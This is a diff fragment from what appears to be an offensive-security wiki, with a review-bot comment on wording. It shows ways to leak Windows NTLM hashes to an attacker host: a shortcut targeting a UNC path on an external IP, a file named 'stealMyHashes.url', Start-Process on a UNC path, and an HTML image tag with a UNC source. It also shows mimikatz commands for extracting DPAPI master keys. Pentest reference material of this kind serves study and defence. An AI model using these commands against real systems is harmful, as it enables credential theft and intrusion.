$lnk.TargetPath = "\\35.164.153.224\@OsandaMalith"
@ -269,7 +269,7 @@ $lnk.Save()
Another shortcut in Windows is the Internet shortcuts. You can save this as something.url
```
```bash
echo [InternetShortcut] > stealMyHashes.url
echo URL=file://192.168.0.1/@OsandaMalith >> stealMyHashes.url
```
@ -301,7 +301,7 @@ Start-Process \\192.168.0.1\aa
IE will resolve UNC paths. For example
```
```html
<img src="\\\\192.168.0.1\\aa">
```

View file

@ -117,7 +117,7 @@ For where you can extract the master key with mimikatz:
<pre class="language-bash"><code class="lang-bash"><strong># If you know the users password
</strong><strong>dpapi::masterkey /in:"C:\Users\&#x3C;username>\AppData\Roaming\Microsoft\Protect\S-1-5-21-2552734371-813931464-1050690807-1106\3e90dd9e-f901-40a1-b691-84d7f647b8fe" /sid:S-1-5-21-2552734371-813931464-1050690807-1106 /password:123456 /protected
</strong><strong>
</strong><strong># If you don't
</strong><strong># If you don't have the users password and inside an AD
</strong>dpapi::masterkey /in:"C:\Users\&#x3C;username>\AppData\Roaming\Microsoft\Protect\S-1-5-21-2552734371-813931464-1050690807-1106\3e90dd9e-f901-40a1-b691-84d7f647b8fe" /rpc</code></pre>
The master key of the file will appear in the output.
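Review bot: the rewritten comment "# If you don't have the users password and inside an AD" reads awkwardly; suggest "# If you don't have the user's password but are inside an AD domain (the /rpc switch asks the DC's backup key service to decrypt the master key)". The `&#x3C;username>` entities and `<strong>` spans are GitBook export artifacts; a fenced ```bash block would keep `<username>` readable in source and match the fence style used elsewhere in this commit.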